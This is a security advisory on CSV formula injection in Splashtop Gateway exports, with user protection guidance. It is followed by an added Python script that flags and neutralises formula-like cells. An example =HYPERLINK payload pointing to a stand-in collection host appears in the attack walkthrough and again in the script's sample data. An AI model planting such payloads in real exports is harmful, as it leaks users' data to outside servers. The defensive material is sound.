Overview
This article is intended to raise awareness about a potential security risk when opening CSV exports in third-party software that interprets formulas. The purpose is to guide users on best practices for handling CSV files securely. Splashtop Gateway exports raw CSV files without data processing capabilities, and the risk arises only when opening these files in applications that execute formulas automatically.
A security risk exists where a user embeds a formula inside a free-text field (such as a group name). If another user exports the data and opens the CSV in spreadsheet software that evaluates formulas (e.g., Microsoft Excel), the application may evaluate the formula instead of displaying the raw text, potentially misleading the viewer or leaking data. This class of issue is commonly known as CSV injection or formula injection.
How an Attack Could Work
- A user enters a formula-like string as a group name, such as:
=HYPERLINK("http://malicious-site[.]com/collect?data="&A24, "Click here")
- Another user exports the CSV, which includes this formula-like string.
- When the exported file is opened in software that interprets formulas, it processes the formula instead of displaying the raw text.
- If the user clicks the displayed hyperlink, the contents of the referenced cell (A24 in this example) could be sent to an external server.
This attack is not limited to group CSV exports and could affect any CSV export containing user-generated content.
Why Splashtop CSV Exports Are Safe
- CSV is a plain-text format – It does not execute formulas, process data, or trigger actions by itself.
- Our system exports raw CSV data – No hidden processing, execution, or transformation occurs within the exported file.
- Security risks only arise when opening CSV files in third-party software that automatically processes formulas instead of displaying raw text.
Thus, the security risk is introduced by the application used to open the CSV, not the CSV file itself. Users should be aware of these risks when opening CSV files in software like Microsoft Excel or Google Sheets.
Other Potential Attacks
- WEBSERVICE formulas (available in Excel on Windows) – Could be used to transmit data silently when a file is opened, without the viewer clicking anything.
- Calculation formulas (e.g., =A1+B2) – Could alter displayed values, misleading the viewer.
- Other embedded formulas – Could trigger unintended behavior when opened in certain spreadsheet programs.
How to Protect Yourself
1. Open CSV Files Safely
- Use a text editor (e.g., Notepad) or a dedicated CSV viewer instead of Excel.
- Disable automatic formula execution in spreadsheet applications when opening CSV files.
- Do not click on unexpected links or unfamiliar data inside a CSV file.
2. Organizational Best Practices
- Educate employees and users about the risks of malicious CSV content.
- Monitor and review CSV export logs for suspicious input patterns.
- Keep security features enabled in Office applications and enforce organization-wide best practices for handling CSV files.
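As an added example (not Splashtop's code or part of the original article), the following Python script scans an exported CSV for cells that a spreadsheet would treat as formulas and writes a copy in which those cells are prefixed with a single quote so they are shown as text. It goes beyond the article's `=` case: `+`, `-`, `@`, tab and carriage return are also treated as triggers (an assumption based on common CSV-injection guidance), plain numbers such as `-5` are left alone, and the embedded sample export is constructed for the demonstration.

```python
import csv
import io
import re

# Leading characters that Excel, LibreOffice Calc and Google Sheets treat as the
# start of a formula. Tab and carriage return are included because they can hide
# a trigger from a check that only inspects the first visible character.
# (Assumption: this list follows common CSV-injection guidance, not the article.)
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")
PLAIN_NUMBER = re.compile(r"^[+-]?\d+(\.\d+)?$")


def looks_like_formula(cell):
    """True when a spreadsheet would evaluate the cell instead of showing it."""
    value = cell.lstrip(" ")  # spreadsheets ignore leading spaces
    if PLAIN_NUMBER.match(value):  # "-5" or "+3.5" is just a number
        return False
    return value.startswith(FORMULA_TRIGGERS)


def neutralize(cell):
    """Prefix a formula-like cell with a single quote so it is kept as text."""
    return "'" + cell if looks_like_formula(cell) else cell


def scan_csv(text):
    """Return (row, column, value) for every cell that looks like a formula."""
    findings = []
    for r, row in enumerate(csv.reader(io.StringIO(text)), start=1):
        for c, cell in enumerate(row, start=1):
            if looks_like_formula(cell):
                findings.append((r, c, cell))
    return findings


def neutralize_csv(text):
    """Rewrite the export so every formula-like cell is stored as literal text."""
    out = io.StringIO()
    writer = csv.writer(out, lineterminator="\n")
    for row in csv.reader(io.StringIO(text)):
        writer.writerow([neutralize(cell) for cell in row])
    return out.getvalue()


# Constructed sample export: two ordinary groups and one whose name carries the
# HYPERLINK string from the article (domain kept defanged with [.]).
SAMPLE_EXPORT = (
    "group_name,member_count\n"
    "Engineering,12\n"
    '"=HYPERLINK(""http://malicious-site[.]com/collect?data=""&A24, ""Click here"")",1\n'
    "Sales,7\n"
)
```

Run `scan_csv` over an export to list the cells a reviewer should look at, and `neutralize_csv` to produce a copy that is safe to open in a spreadsheet; the original cell text is preserved after the leading quote.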
Disclaimer
Splashtop Gateway provides CSV export functionality that generates raw, unprocessed text-based data. CSV is a plain-text file format and does not contain executable code or perform any processing. Any risk arises only when opening CSV files in software that automatically interprets formulas.
- The security concern is not caused by our product but by how third-party applications handle CSV files.
- We advise users to open exported CSV files with software that does not execute formulas automatically.
- Users are responsible for how they handle exported files in their own environments.
By following these precautions, users can minimize the risk of CSV-based attacks and ensure data integrity when handling exports.